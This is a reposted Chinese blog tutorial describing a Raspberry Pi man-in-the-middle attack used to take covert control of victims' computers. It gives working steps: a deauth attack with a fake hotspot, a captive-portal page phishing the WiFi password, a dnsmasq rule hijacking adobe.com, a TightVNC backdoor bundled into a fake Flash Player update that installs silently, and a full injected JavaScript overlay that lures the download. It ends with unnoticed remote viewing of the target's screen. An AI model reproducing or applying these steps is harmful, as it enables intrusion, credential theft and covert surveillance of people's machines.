導(dǎo)讀

上文講解了樹莓派隨身工具箱的環(huán)境搭建，這段時(shí)間又對(duì)其進(jìn)行了一些優(yōu)化，主要是從便攜美觀上面改進(jìn)。同時(shí)，在實(shí)際使用中發(fā)現(xiàn)了一些問題，并做了小小的改動(dòng)。

傳統(tǒng)的中間人攻擊要用到arpspoof等敏感操作，大多數(shù)情況下會(huì)被殺毒軟件攔截，同時(shí)被攻擊端會(huì)出現(xiàn)亂碼，網(wǎng)速卡頓甚至掉線等現(xiàn)象。而利用樹莓派搭建物理中間人則可以有效避免以上現(xiàn)象。樹莓派一個(gè)網(wǎng)卡用來接入互聯(lián)網(wǎng)，另一個(gè)網(wǎng)卡作為熱點(diǎn)，進(jìn)行客戶端劫持，使目標(biāo)流量都經(jīng)過自身。

?

前期準(zhǔn)備

?

1.）整體思路

?

本次滲透測(cè)試采用誘導(dǎo)安裝的方法，通過中間人劫持的方式在網(wǎng)頁(yè)注入js，彈出蒙版層，誘導(dǎo)用戶下載捆綁后門的FlashPlayer更新程序。

?

劫持方法比較多，粗略的列舉一下：

?

1，萬(wàn)能鑰匙類軟件可以解開:

?

I、獲取目標(biāo)路由器操作權(quán)，修改WiFi配置，樹莓派偽造路由器之前的熱點(diǎn)。

?

II、目標(biāo)路由器支持中繼的話，直接修改，將其作為中繼使用，上游設(shè)備為樹莓派。

2、萬(wàn)能鑰匙類軟件無法連接：

?

I、發(fā)送deauth攻擊，阻斷客戶端與目標(biāo)路由器的連接，同時(shí)樹莓派偽造熱點(diǎn)，通過配置樹莓派dnsmasq.config? 啟用no-pool，開啟webserver并配置404頁(yè)面，實(shí)現(xiàn)客戶端接入后自動(dòng)彈出頁(yè)面，誘導(dǎo)用戶輸入WIFI密碼。

?

II、樹莓派抓取握手包，丟在淘寶十五大洋搞定。

?

III、社工方式接觸路由器，快速的按一下wps按鍵。

2.）生成后門程序

?

最好的后門就是那些常見的軟件，永遠(yuǎn)不會(huì)被殺毒軟件干掉。比如ftpserver、Sunlogin oray、VNCserver等。這里選擇tight-vnc-server，小巧便捷；后門生成需要借助7-Zip SFX Maker、Resource Hacker、Regsnap等工具的幫助。首先在本地安裝完畢，然后對(duì)比注冊(cè)表和文件變化，最后提取出來，精簡(jiǎn)核對(duì)后與FlashPlayer一起打包，實(shí)現(xiàn)后臺(tái)靜默安裝。然后就是拿到各個(gè)環(huán)境里面測(cè)試，再針對(duì)性的進(jìn)行修改。

?

測(cè)試完畢后將后門程序放在Apache根目錄，同時(shí)在下文的js里面指定具體位置。

?

3.）配置dnsmasq劫持adobe.com指向本地

?

修改? /etc/dnsmasq.conf 增加

address=/adobe.com/10.0.0.1

?

然后 service dnsmasq restart重啟dnsmasq使配置生效。接著service apache2 start 啟動(dòng)Apache

?

4.）安裝并配置軟件

root@kali:~# apt-get install fruitywifi-module-fruityproxy root@kali:~# service fruitywifi start

?

訪問：http://你的樹莓派地址:8000 用戶名和密碼都為admin

?

config設(shè)置如下圖：

?

?

IN是提供AP接入點(diǎn)的網(wǎng)卡 OUT是連接上外網(wǎng)的網(wǎng)卡，可根據(jù)實(shí)際情況配置。

?

5.）實(shí)施滲透

?

各項(xiàng)準(zhǔn)備完畢，目標(biāo)設(shè)備流量已全部經(jīng)過樹莓派。

?

?

首先運(yùn)行bettercap對(duì)所有流經(jīng)樹莓派的流量進(jìn)行嗅探，粗略的了解下對(duì)方網(wǎng)絡(luò)流量情況（一些常用的命令可以事先寫成腳本，方便使用）

?

bettercap -I wlan1 -O log.txt -X -L -S NONE

?

?

通過網(wǎng)絡(luò)流量以及nmap掃描可以很快的確定對(duì)方主機(jī)的IP地址。然后在主機(jī)發(fā)生網(wǎng)絡(luò)訪問的時(shí)候開啟fruitywifi Inject模塊。

?

在 status→fruityprox edit→Inject里面寫入要注入的js腳本，實(shí)現(xiàn)誘導(dǎo)下載。

<script>(function(a){window.isMobile=false;if(/(android|ipad|playbook|silk|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){window.isMobile=true}else{setTimeout("showDiv();",2000)}})(navigator.userAgent||navigator.vendor||window.opera);document.writeln("<div><style type=\'text/css\'>body{overflow:hidden;height:100%}.popWindow{background-color:#9D9D9D;width:100%;height:100%;left:0;top:0;filter:alpha(opacity=50);opacity:0.5;z-index:8900;position:absolute}.maskLayer{background-color:#636365;box-shadow:0 0 15px#393838;padding:10px;width:220px;line-height:30px;left:50%;top:50%;margin-left:-100px;margin-top:-100px;color:#ea8726;z-index:9000;position:absolute;text-align:center}</style><div id=\'popWindow\'class=\'popWindow\'style=\'display: none;\'></div><div id=\'maskLayer\'class=\'maskLayer\'style=\'display: none;\'><p>頁(yè)面檢測(cè)到您的Flash Player版本太低，請(qǐng)下載并安裝更新！</br><a target=\'_blank\'href=\'http://get.adobe.com/flashplayer/flashplayer29_va_install.exe\'onclick=\'closeDiv()\'style=\'cursor:pointer;text-decoration: none;\'><input value=\'下載更新\'type=\'button\'></a></p></div></div>");function showDiv(){document.getElementById('popWindow').style.display='block';document.getElementById('maskLayer').style.display='block'}function closeDiv(){document.getElementById('popWindow').style.display='none';document.getElementById('maskLayer').style.display='none';document.body.style.overflow="visible"}</script>

?

注入的script不能有換行，所以需要提前把代碼壓縮一下。本機(jī)測(cè)試樣式如下：

?

?

注入完畢后腳本會(huì)自動(dòng)檢測(cè)當(dāng)前瀏覽器是移動(dòng)端還是pc端，如果是PC端就延遲三秒，然后彈出蒙版同時(shí)誘導(dǎo)下載，用戶點(diǎn)擊后，關(guān)閉蒙版，恢復(fù)對(duì)頁(yè)面的操作（亦或者一直阻止對(duì)頁(yè)面的操作）。手機(jī)端就什么也不做。并且由于事先在樹莓派上配置好了dnsmasq 使默認(rèn)dnsserver以及dhcpserver都指向樹莓派，加上adobe域名的劫持，客戶端看不出太大的端倪（下載地址是http而不是adobe默認(rèn)的https，不過這已經(jīng)足夠騙過很多人了。）

?

6）.檢查執(zhí)行情況

?

每隔一段時(shí)間就對(duì)目標(biāo)IP進(jìn)行一次nmap掃描，當(dāng)發(fā)現(xiàn)5900端口開放的時(shí)候，就可以確認(rèn)滲透完成，此時(shí)關(guān)閉Inject模塊。

?

附圖·-安裝過程：

?

?

后門程序和tvnserver同步安裝，縱使發(fā)生意外情況，tvnserver安裝失敗，在flashplayer安裝程序進(jìn)程結(jié)束后還會(huì)進(jìn)行安裝情況檢查，并嘗試第二次安裝（不安裝為系統(tǒng)服務(wù)，使用用戶模式）。

?

7.）enjoy

?

使用vncviewer進(jìn)行連接，目標(biāo)主機(jī)全程無提示，無小圖標(biāo)。還可以在不影響目標(biāo)主機(jī)的情況下觀察對(duì)方屏幕。

?

?

嗯，不要懷疑。我在醫(yī)院數(shù)據(jù)中心工作。負(fù)責(zé)維護(hù)系統(tǒng)的安全。

?

謹(jǐn)此，獻(xiàn)給各位。

總結(jié)

以上是生活随笔為你收集整理的[转载]树莓派随身工具箱：中间人劫持获取控制权的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。